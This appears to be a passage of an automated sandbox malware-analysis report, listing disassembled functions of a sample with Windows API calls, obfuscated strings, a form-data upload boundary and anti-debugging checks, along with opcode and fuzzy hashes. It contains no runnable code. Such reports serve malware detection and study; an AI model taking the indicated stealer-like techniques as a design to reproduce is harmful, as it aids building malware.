                                                                    • Instruction Fuzzy Hash: 07D01232245228B7DB013A94DC09BCEBB5CDF09BA6F008021FB0DE9080CBB09A4046EA
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID:
                                                                    • API String ID: 4218353326-0
                                                                    • Opcode ID: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                                    • Instruction ID: 1d70213f864448114667fa93143398f689e43ce09380febb34e55b8e9c3c6d32
                                                                    • Opcode Fuzzy Hash: 4e1718403e1c9f4dc854db183ebccdab995ea214547ce8d1c5d4ce7d2dfc11b0
                                                                    • Instruction Fuzzy Hash: AEC1ECB1A05B009FD724CF29C88166BFBE5FF88314F14892EE5AA83750E774E845CB56
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                                    • Instruction ID: 373710123005f16d466fbf61102d91235a16be84b9ed3eb2ab6254e0a7e141d7
                                                                    • Opcode Fuzzy Hash: 0a8d065c2e7d1e5bd55c3a73d0c85b8c9c2db864d3e8117d795f012447403357
                                                                    • Instruction Fuzzy Hash: B6016D33B001145FBF11CE69EC4595B3796EBC1328B244132F904CB185FB39CC028389
                                                                    APIs
                                                                      • Part of subcall function 0044EB6F: RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                                    • RtlReAllocateHeap.NTDLL(00000000,00000000,00413871,00000000,00000000,00000000,00413871,00000000,00000000,74E2F770,?,0041A136,00001FE6,00003CA7,?,000016E5), ref: 004569FC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                                    • Instruction ID: a5a40cd43560794f83e54c6bbfcb227c9197063c5c667a14a31a2b77de81b9f8
                                                                    • Opcode Fuzzy Hash: a0eecb7647cd985660cbc4ebe15971cfc3f9a0df64ec6594d00528a4e276af4a
                                                                    • Instruction Fuzzy Hash: 80F0C8B110011576AB212A279C01B6B276C9FC1B76F56013FFC1497293EE7C9809C29E
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0044D36A,00000001,00000364,00000000,00000008,000000FF,?,00447A98,00426F52,?,?), ref: 00450371
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                                    • Instruction ID: 035a614d3876f6906020b157cdd10206fdefeae5334def747215f66390aa104c
                                                                    • Opcode Fuzzy Hash: 9d9d3e8b2bef017808805eba958564c636c8c3ec0520770245b5987c827fdf69
                                                                    • Instruction Fuzzy Hash: BBF05939200620A7AB205B728C01B6B3758AF81772B044127FC08DA282DA38DC09C6EE
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,00426DF1,?,?,00426DF1,?), ref: 0044EBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                                    • Instruction ID: b54a30de40d39881521df567edad888a5efcf5dcf9e065f2953d68bc5b8e4da5
                                                                    • Opcode Fuzzy Hash: 46e01d2afbdcef2c31f25b6f499ced1eedd9cf58f859f57e9987ca3508fff049
                                                                    • Instruction Fuzzy Hash: 3AE0E5212001A56AFA30A767CC01B6B3A4DFF417B8F010037ED47A62D1DBACEC0285AE
                                                                    APIs
                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 008AD866
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612871914.00000000008AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8ad000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                    • Instruction ID: 38ccf6585f705871f64701e24b13d9c5f9c8e1573d2553e911edeb3d75141af3
                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                    • Instruction Fuzzy Hash: 13112879A00208EFDB01DF98C985E98BBF5EF08751F0580A4F9489B362D375EA90DB90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrlen
                                                                    • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$Y[[T$bi${#9${#9$Y=`$Y=`
                                                                    • API String ID: 1659193697-3907602706
                                                                    • Opcode ID: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                                    • Instruction ID: 061f2e9c6992cadd8bb6edb3a7c72a9665a9c38d2bc4fcde0046632fbb5de356
                                                                    • Opcode Fuzzy Hash: b550c6edbfc739eb8f81f84309a248c2000b550dd3d445275482cde3558858bf
                                                                    • Instruction Fuzzy Hash: F5F208B1D0061E8BDF268F58C9456BEBBB5AB05718F24052BE506FB391E774CB40CB92
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: Content-Disposition: form-data; name="$A@6e$A@6e$Content-Type: attachment/x-object$RY30$SqDe87817huf871793q74$^^4$^^4$ame=$ilen
                                                                    • API String ID: 4218353326-1595699696
                                                                    • Opcode ID: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                                    • Instruction ID: 2d689a8b6144ae040ff6817911910587bd341415a88b77611baba4cffa878017
                                                                    • Opcode Fuzzy Hash: 7907d723524d677c7fba307958eceda359f7f54ff42f453c8872ada657c95bff
                                                                    • Instruction Fuzzy Hash: EC72A771D442198BDF18CF98D9855FEBBB0EB14314F24056BE915EB360E3788A858BCB
                                                                    APIs
                                                                    • wsprintfW.USER32 ref: 02364942
                                                                    • RegEnumKeyExW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0236498C
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020019,?,00000001), ref: 0236500C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: EnumOpenwsprintf
                                                                    • String ID: $jRk$$jRk$?$TT4$TT4$y_B>$y_B>
                                                                    • API String ID: 934838074-1833258458
                                                                    • Opcode ID: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                                    • Instruction ID: 19feb013a6cf79eff8d439eebe8dd6630f6f5f91c1dacc54ec829864038a82b4
                                                                    • Opcode Fuzzy Hash: 3b54bece40eef002e0db5d64569429b679c5c83022a00990b2c8552d4bb31e81
                                                                    • Instruction Fuzzy Hash: E8624CB1D0021A8BCF34CB98D88C6BDBABDAB14714F24C626D645EB359D374CA51CBD2
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strncpy
                                                                    • String ID: $jRk$$jRk$3Z@$576xed$TT4$TT4$x_B>$y_B>$y_B>
                                                                    • API String ID: 2961919466-3812700333
                                                                    • Opcode ID: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                                    • Instruction ID: c1f0278ec094f6be02d202c53d620e15fc525e7d6860b659e372b79efda81f17
                                                                    • Opcode Fuzzy Hash: 736beb57220df515d506b056ccd7fd11a59d56b837410d7613fdb76fd6dde63c
                                                                    • Instruction Fuzzy Hash: 3982DBB1D0051A8BDF28DB68C9451BEB670EB5C310F29662BE505EB360D738DE418B9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$n_v$n_v$u2B$v2B$v2B
                                                                    • API String ID: 0-3549259986
                                                                    • Opcode ID: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                                    • Instruction ID: 3c731e79af0a7bf0a604628639f1c40d542e5cd86105cca68e770fcb4dd532d8
                                                                    • Opcode Fuzzy Hash: a0ad07c5876174a456e6ff089356687033de193354f657ccdd22f267db1287ce
                                                                    • Instruction Fuzzy Hash: DCE208B1E002199BDF29CB98C8856BE7AB5AF40314F14056BF50AFB7A1D774DB40CB92
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: Content-Disposition: form-data; name="$ &$($:[$SqDe87817huf871793q74
                                                                    • API String ID: 4218353326-898291561
                                                                    • Opcode ID: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                                    • Instruction ID: fda5cd55cfb9f0796932eaeb7ac8b2d4ab06e0c9493bffbe09938a436643aec3
                                                                    • Opcode Fuzzy Hash: f011c9fed8efc87c81c5afbe689e28c72ff5ebee152719aa64aabc7cc97206bc
                                                                    • Instruction Fuzzy Hash: 7F128DB090560A8BCF18CF58C9901BEBBB1FF54354F24592BE855EB394D7388991CB8B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strncpy
                                                                    • String ID: $jRk$$jRk$TT4$TT4$mE$x_B>$y_B>$y_B>
                                                                    • API String ID: 2961919466-2403683918
                                                                    • Opcode ID: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                                    • Instruction ID: 22b096d44901ad24eeef4dc69764f4a0ba606ea3cfa2d06e25c1f3dba60b6422
                                                                    • Opcode Fuzzy Hash: 0fce3017fde26660b2fe1cd63b9b85230b5f86defa1d6f60f2e91c8398972e3b
                                                                    • Instruction Fuzzy Hash: ED8227B1D1021D8BDF24CB98D89D6BDBABCAB04254F64853BD405EB359E334DA80CF96
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: f3@$x_B>$y_B>$y_B>
                                                                    • API String ID: 0-2758273646
                                                                    • Opcode ID: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                                    • Instruction ID: 769378b0013e5f891025f4b50e79353ec4a26f3ac52f3a61e025b4fcd72a7191
                                                                    • Opcode Fuzzy Hash: 4d800e4a8c53861f20154e06e0aaefdbc94ae587142e1632d027028e9bc40389
                                                                    • Instruction Fuzzy Hash: 2BC1A1756183019BCB2C8A19C99153EBAE5AB85314F14893FF556EB3F0E338D8419B4B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: Ju^%$Ku^%$Y=`$Y=`$Y=`
                                                                    • API String ID: 4218353326-1811093487
                                                                    • Opcode ID: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
                                                                    • Instruction ID: 68bed0c00360ed0a45c1e6ce9cbfc25002c960087630870fd3b76e024578c11c
                                                                    • Opcode Fuzzy Hash: cf27e2aad08aa0ad968c1e6dfb0571fb3b005bd4e8b72d189d402ef4653cb86d
                                                                    • Instruction Fuzzy Hash: D662D3B1D402198BCF24CB98C9856BEBBB0EB18305F24251BD595FB350D33CCA518BAB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: (lu$)lu$)lu$n_v$n_v$u2B$v2B$v2B
                                                                    • API String ID: 4218353326-1100714106
                                                                    • Opcode ID: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
                                                                    • Instruction ID: a2355ce2209b5258348a648dcbfed05c01f212a34098c733ae6d56c92e88b106
                                                                    • Opcode Fuzzy Hash: fc83baca781e6038d85ce843f57f52639d84c7305a5e30f3d91329c925e2716a
                                                                    • Instruction Fuzzy Hash: 717284B2D001199BCF64CFAC848557EB6B0BB18310F24251BD55AEB351E3B89E91CF9B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
                                                                    • Instruction ID: 851cf4d307f2775529c2b2c48624cd02a74d3cb87db6a9e2c754e45b37c83e55
                                                                    • Opcode Fuzzy Hash: 9df9496146953a9c334645953d65b23cf1161b90a9ddbaf06c4857e78f5672f2
                                                                    • Instruction Fuzzy Hash: C5D23B71E082288FDB65CE24DD407EAB7B5EB44306F1445EBD80DE7241EB78AE898F45
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $jRk$$jRk$ST4$TT4$q7 C$q7 C$y_B>
                                                                    • API String ID: 0-4120928008
                                                                    • Opcode ID: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                                    • Instruction ID: 5ed2bce57202caa61740e9a0066a193a3aa364e15e010ca0d77f5b321bac14a1
                                                                    • Opcode Fuzzy Hash: 19062003c26532868454498e227e50f3dc71298f1981b794ebff368204a50fa7
                                                                    • Instruction Fuzzy Hash: 6792C670B0A3159BD724DF18E58563EBAE1EB94700FA8891FE5C9CB390D679CC418B4B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleModuleName
                                                                    • String ID: T5 S$U5 S$U5 S$]cnq$fS))
                                                                    • API String ID: 2106025501-2879408294
                                                                    • Opcode ID: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
                                                                    • Instruction ID: dfb0ff48f0b3588d0c8ddc0fc82928454e0cf031636ecd05e75d9b592114eb49
                                                                    • Opcode Fuzzy Hash: d4ef6aecc819cbfd79ed1537f8e605b86188b9f0b6e42f283061d9fbf544773c
                                                                    • Instruction Fuzzy Hash: B2A271B07097118BD724EF1DE69522EBBE0EB94750FA58D1FE185CB350E638C8819B4B
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExitProcessSleep
                                                                    • String ID: Ku^%$Ku^%
                                                                    • API String ID: 911557368-1067927601
                                                                    • Opcode ID: 82cfc510ece84957cbba0257fc153cb2f1f42220bc350d1360029cd4826f0e13
                                                                    • Instruction ID: ae3353009da93772ca4eb3d457df80e4ada0c426cddf7d4427e14e292bc8784f
                                                                    • Opcode Fuzzy Hash: 82cfc510ece84957cbba0257fc153cb2f1f42220bc350d1360029cd4826f0e13
                                                                    • Instruction Fuzzy Hash: 12A102B1514B018BCB368F1DC990A27B6F5AB45724724891EECABCBA61D774EE50CF02
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: (lu$)lu$)lu$n_v$n_v
                                                                    • API String ID: 0-3830700584
                                                                    • Opcode ID: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                                    • Instruction ID: 4a2fd8414ffc0d2b7e824df66967180c6b9bc980e05f2bb9b5fb8abbe135a622
                                                                    • Opcode Fuzzy Hash: 19f3eafb4a0e727bd08de773a29381a3a5c2a5b051c77c6b774b19f95aa7016b
                                                                    • Instruction Fuzzy Hash: 1D22B478D0460A9BCF24CF9DC8956FFBBB0EB14304F24052BD515EB351D3789A868B9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%
                                                                    • API String ID: 0-3469696018
                                                                    • Opcode ID: 6ec76950be12901a45a75c5ce88806d55f504ea767741fb8e6c205ae61d7ac73
                                                                    • Instruction ID: 7c7ca289ac7ac6f99319bda9901ca4dbbf0a493f194e0bb693dffbcb6a384f16
                                                                    • Opcode Fuzzy Hash: 6ec76950be12901a45a75c5ce88806d55f504ea767741fb8e6c205ae61d7ac73
                                                                    • Instruction Fuzzy Hash: 2EB11871D1021987CF38DF58884AA7E7679BB82304F284627ED59EBA55E334C640CB93
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,00469144,?,0233BA31,0233CC5B,?,?,?), ref: 0233AEC5
                                                                    • lstrcatW.KERNEL32(?,0045FD78,?,?,?,?,?,?,?,?,00469144,?,0233BA31,0233CC5B,?,?), ref: 0233AF29
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcatlstrlen
                                                                    • String ID:
                                                                    • API String ID: 1475610065-0
                                                                    • Opcode ID: ef72a88249dd871b6e6f7590a3c2d473460619251f7bcc7e3a36d31713e60fb7
                                                                    • Instruction ID: 718d68a3a69de4f10929df6516c9a92aa138f432d4c3b93c6123637d506a5ca7
                                                                    • Opcode Fuzzy Hash: ef72a88249dd871b6e6f7590a3c2d473460619251f7bcc7e3a36d31713e60fb7
                                                                    • Instruction Fuzzy Hash: 86022571D102198BDF2A8F58C891BFDB676BB08318F14462BE455EB2A0E3748B41CB96
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
                                                                    • Instruction ID: 8ec8fb1480d7890853f4d9f50d5551423c0e27afaeab5e375f7c18d1f8a446b0
                                                                    • Opcode Fuzzy Hash: 05cda982c4f09bd88feb10a38f7641e7fd96d80131b6e6d53e56f63ddc665004
                                                                    • Instruction Fuzzy Hash: 7EB147329002559FFB11CF68C8817EFBBA5EF55304F14817BE815AB342D6389D0ACB69
                                                                    APIs
                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 00452057
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 004520D2
                                                                    • FindClose.KERNEL32(00000000), ref: 004520F4
                                                                    • FindClose.KERNEL32(00000000), ref: 00452117
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$CloseFile$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1164774033-0
                                                                    • Opcode ID: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
                                                                    • Instruction ID: 88b061fe18a59ed71dd7726e396f37314d98d9ff08531aa008276cfa6a830ce1
                                                                    • Opcode Fuzzy Hash: b3559cba144369e4368cc0700d5b7fee314850b44e79167534ac2f09849a45e7
                                                                    • Instruction Fuzzy Hash: 4F411971901519AFDF20DF64DD88ABFB379EB4530AF004197E905D3181E7B89E88CB69
                                                                    APIs
                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000), ref: 023822BE
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 02382339
                                                                    • FindClose.KERNEL32(00000000), ref: 0238235B
                                                                    • FindClose.KERNEL32(00000000), ref: 0238237E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2330000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Find$CloseFile$FirstNext
                                                                    • String ID:
                                                                    • API String ID: 1164774033-0
                                                                    • Opcode ID: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                                    • Instruction ID: 8a0010b05d2259908ce830c831d36ff31ce5211dd520ee179a24856a0ee9ee51
                                                                    • Opcode Fuzzy Hash: 98469444129287ec3a0223e4e6863df554afa6925fe0b01ec864058e1a2505ac
                                                                    • Instruction Fuzzy Hash: CF41A171A00759AADB20EF64CC98ABBB3B9EB84304F044195EC05DB144E770DE84CF65
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _strlen
                                                                    • String ID: 0$8
                                                                    • API String ID: 4218353326-46163386
                                                                    • Opcode ID: dffc9e5abd372e9afb64596e263c2f6f11399d763a87511cb0e2e762d002d851
                                                                    • Instruction ID: 4a4157f18493c412a49744d30cfcbbbc573f023624cab823fa42490c9b2fab12
                                                                    • Opcode Fuzzy Hash: dffc9e5abd372e9afb64596e263c2f6f11399d763a87511cb0e2e762d002d851
                                                                    • Instruction Fuzzy Hash: 037256716083409FCB14CF19C880BABBBE2AF88314F15892EF99887351D779D995CF96
                                                                    APIs
                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043CEA1
                                                                    • IsDebuggerPresent.KERNEL32 ref: 0043CF6D
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043CF8D
                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0043CF97
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3612525483.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_g1kWKm20Z5.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                    • String ID:
                                                                    • API String ID: 254469556-0
                                                                    • Opcode ID: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                                    • Instruction ID: 9043f40afcec0259649162862996236607bac432cbf7b643fd488768b54bd5d0
                                                                    • Opcode Fuzzy Hash: 5a224689ebe3c8543fae9108879d47dacd2795cfdd161b4ae1d22f43ac1ac262
                                                                    • Instruction Fuzzy Hash: 57312BB5D05219DBDB10DF65D989BCDBBB8AF08304F1040AAE40DA7250EBB55A84CF49
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3614139526.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Offset: 02330000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
